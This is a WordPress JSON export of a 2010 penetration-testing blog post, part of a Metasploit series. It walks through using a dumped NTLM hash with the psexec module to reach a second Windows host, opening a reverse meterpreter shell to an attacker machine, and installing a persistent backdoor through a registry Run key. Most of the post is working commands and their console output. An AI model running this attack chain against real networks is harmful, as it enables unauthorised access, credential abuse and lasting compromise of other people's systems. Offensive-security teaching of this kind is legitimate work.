{"id":22,"date":"2010-10-08T01:32:00","date_gmt":"2010-10-08T01:32:00","guid":{"rendered":"http:\/\/www.somethingsomethingsecurity.com\/?p=22"},"modified":"2010-10-08T01:32:00","modified_gmt":"2010-10-08T01:32:00","slug":"metasploit-on-the-edge-part-4-next-up-to-bat","status":"publish","type":"post","link":"https:\/\/www.somethingsomethingsecurity.com\/?p=22","title":{"rendered":"Metasploit on the edge Part 4 &#8211; next up to bat"},"content":{"rendered":"<p>See the previous for the usual nag lines&#8230;<br \/><span><\/span><\/p>\n<div><b><span>Background<\/span><\/b><span><\/span><\/div>\n<div><span>When last we left, we had just launched a meterpreter session on our internal client and did some looking around for other systems.<\/span><\/div>\n<div><span><strong>Process<\/strong><\/span><\/div>\n<div><span>So now that we have identified some systems, let&#8217;s exploit one.<\/span><\/div>\n<div><span>10.13.37.130 looks interesting. Judging by the ports, it&#8217;s probably a windows system. I wonder if Fred has an account on it. Let&#8217;s see by using the Metasploit exploit psexec.<\/span><\/div>\n<div><span><span>use exploit\/windows\/smb\/psexec<\/span><\/span><\/div>\n<div><span>msf exploit(psexec) > <span>set <\/span><span>SMBUSER fred<\/span><\/span><span>SMBUSER => fred<br \/>msf exploit(psexec) > <span>set SMBPASS 921988ba001dc8e14a3b108f3cb6d:e19c5ee54e06b06a5907af13cef42<\/span><\/span><br \/><span><span>msf exploit(psexec) ><\/span> set LPORT 80<\/span><br \/><span><span><span>msf exploit(psexec) > <\/span><span>set LHOST 192.168.1.155\u00a0<\/span><\/span><\/span><br \/><span><span><span>msf exploit(psexec) > <\/span><span>set RHOST 10.13.37.130<\/span><\/span><\/span><br \/><span><span>msf exploit(psexec) > <span>set PAYLOAD windows\/meterpreter\/reverse_tcp<\/span><\/span><\/span><\/div>\n<p><span><span><\/span><\/span><\/p>\n<div><span><span><span><span><span>Explanation<\/span><\/span><\/span><\/span><\/span><\/div>\n<div><span>psexec is a powerful weapon against Windows machines. The exploit is based on the psexec tool by Mark Russinovich, just one of the amazing Windows tools\u00a0from the Sysinternals section of microsoft.com, but Metasploit adds to it\u00a0the extra bonus of being able to use the LM\/NT hash instead of\u00a0the password. For more information on how the pass the hash technique works, see <a href=\"http:\/\/oss.coresecurity.com\/projects\/pshtoolkit.htm\">http:\/\/oss.coresecurity.com\/projects\/pshtoolkit.htm<\/a>.<\/span><\/div>\n<div><span>In\u00a0the previous episode, we dumped the hash from the first system using the hasdump tool.\u00a0We will use it\u00a0now.\u00a0<\/span><span><\/span><span>msf exploit(psexec) >\u00a0 exploit <\/span><\/p>\n<div><span>[*] Started reverse handler on 192.168.1.155:80<\/span><\/div>\n<div><span>[*] Connecting to the server&#8230;<\/span><\/div>\n<div><span>[*] Authenticating as user &#8216;fred&#8217;&#8230;<\/span><\/div>\n<div><span>[*] Starting the service&#8230;<br \/>..<\/span><\/div>\n<div><span>[*] Meterpreter session 2 opened (192.168.1.155:80 -> 192.168.1.156:56723)<\/span><\/div>\n<div><span>Success. Looks like Fred does have an account.<\/span><\/div>\n<div><span>meterpreter > ipconfig<\/span><\/div>\n<div><span>Intel(R) PRO\/1000 MT Network Connection #2<br \/>Hardware MAC: 00:0c:29:6f:46:81<br \/>IP Address\u00a0 : 10.2.2.129<br \/>Netmask\u00a0\u00a0\u00a0\u00a0 : 255.255.255.0<\/span><\/div>\n<div><span>Intel(R) PRO\/1000 MT Network Connection<br \/>Hardware MAC: 00:0c:29:6f:46:77<br \/>IP Address\u00a0 : 10.13.37.55<br \/>Netmask\u00a0\u00a0\u00a0\u00a0 : 255.255.255.0<\/span><\/div>\n<div><span>Excellent! This server has two network cards. We could just start exploring this new network, but let&#8217;s start using this machine as our pivot device. <\/span><\/div>\n<div><span>There are several ways to use meterpreter as a backdoor. <\/span><\/div>\n<div><span>We could use the payload metsvc, but this payload is a bind shell exploit. In other words our machine connects to a port on the target machine (which port it uses can be changed in the metsvc.rb file in the rport section). This won&#8217;t work in our scenario because of the firewall.<\/span><\/div>\n<div><span>We could also use msfpayload and generate an executable and use meterpreter to upload the new executable to the server. There are excellent examples of using msfpayload on synjukie.blogspot.com\/2008\/10\/metasploit-payloads-msfpayload.html.<\/span><\/div>\n<div><span>But&#8230;there is an even easier option since we already have a meterpreter session- persistence.<\/span><\/div>\n<div><span><span>run persistence-U -i 5 -p 443 -r 192.168.1.155<\/span><\/span><\/div>\n<div><span>Explanation<br \/>-U start the agent when the user logs on<br \/>-i check back every 5 seconds<br \/>-p and -r are our port and ip <\/span><\/div>\n<div><span>[*] Creating a persistent agent: LHOST=192.168.1.155 LPORT=443 (interval=5 onboot=true)<\/span><\/div>\n<div><span>[*] Persistent agent script is 611056 bytes long<\/span><\/div>\n<div><span>[*] Uploaded the persistent agent to C:\\WINDOWS\\TEMP\\rRFCGIkV.vbs<\/span><\/div>\n<div><span>[*] Agent executed with PID 312<\/span><\/div>\n<div><span>[*] Installing into autorun as HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\RomCdWAl<\/span><\/div>\n<div><span>[*] Installed into autorun as HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\RomCdWAl<\/span><\/div>\n<div><span>[*] For cleanup use command: run multi_console_command -rc \/&#8230;&#8230;&#8230;..\/clean_up__20100917.5158.rc<\/span><\/p>\n<div><span>So now we lets exit all our meterpreter sessions\u00a0<\/span><\/div>\n<div><span>meterpreter > <span>exit<\/span><\/span><\/div>\n<div><span>[*] Meterpreter session 2 closed.\u00a0 Reason: User exit<\/span><\/div>\n<div><span>msf exploit(psexec) > <span>sessions -i 1<\/span><\/span><\/div>\n<div><span>[*] Starting interaction with 1&#8230;<\/span><\/div>\n<div><span>remove the route since we won&#8217;t be needing this one anymore<\/span><\/div>\n<div><span>meterpreter ><span> exit<\/span><\/span><\/div>\n<div><span><span>now setup our new payload handler<\/span><\/span><\/div>\n<div><span><span><\/span><\/span><span><span>msf exploit(psexec) > <span>use exploit\/multi\/handler<\/span><\/span><\/span><\/div>\n<div><span><span>msf exploit(handler) ><span> set payload windows\/meterpreter\/reverse_tcp<\/span><\/span><\/span><\/div>\n<div><span><span>payload => windows\/meterpreter\/reverse_tcp<\/span><\/span><\/div>\n<div><span><span>msf exploit(handler) ><span> set LHOST 192.168.1.155<\/span><\/span><\/span><\/div>\n<div><span><span>LHOST => 192.168.1.155<\/span><\/span><\/div>\n<div><span><span>msf exploit(handler) ><span> set LPORT 443<\/span><\/span><\/span><\/div>\n<div><span><span>LPORT => 443<\/span><\/span><\/div>\n<div><span><span>msf exploit(handler) ><\/span><span> exploit<\/span><\/span><\/div>\n<div><span><span>and as quick as you can say &#8220;Bob&#8217;s your uncle&#8221;<\/span><\/span><\/div>\n<div><span><span>[*] Started reverse handler on 192.168.1.155:443<br \/>[*] Starting the payload handler&#8230;<br \/>[*] Sending stage (748544 bytes) to 192.168.1.156 <br \/>[*] Meterpreter session 3 opened (192.168.1.155:443 -> 192.168.1.156:61943<\/span><\/span><\/div>\n<div><span><span>our persistence payload connected back to us.<\/span><\/span><\/div>\n<div><span><span><strong>Next Steps<\/strong><\/span><\/span><\/div>\n<div><span><span>Exploring the next hop in the network, using portfwd to rdp.<\/span><\/span><\/div>\n<\/div>\n<\/div>\n","protected":false},"excerpt":{"rendered":"<p>See the previous for the usual nag lines&#8230; Background When last we left, we had just launched a meterpreter session on our internal client and did some looking around for other systems. Process So now that we have identified some systems, let&#8217;s exploit one. 10.13.37.130 looks interesting. Judging by the ports, it&#8217;s probably a windows [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4,3],"tags":[],"class_list":["post-22","post","type-post","status-publish","format-standard","hentry","category-metasploit","category-red"],"_links":{"self":[{"href":"https:\/\/www.somethingsomethingsecurity.com\/index.php?rest_route=\/wp\/v2\/posts\/22","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.somethingsomethingsecurity.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.somethingsomethingsecurity.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.somethingsomethingsecurity.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.somethingsomethingsecurity.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=22"}],"version-history":[{"count":0,"href":"https:\/\/www.somethingsomethingsecurity.com\/index.php?rest_route=\/wp\/v2\/posts\/22\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.somethingsomethingsecurity.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=22"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.somethingsomethingsecurity.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=22"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.somethingsomethingsecurity.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=22"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}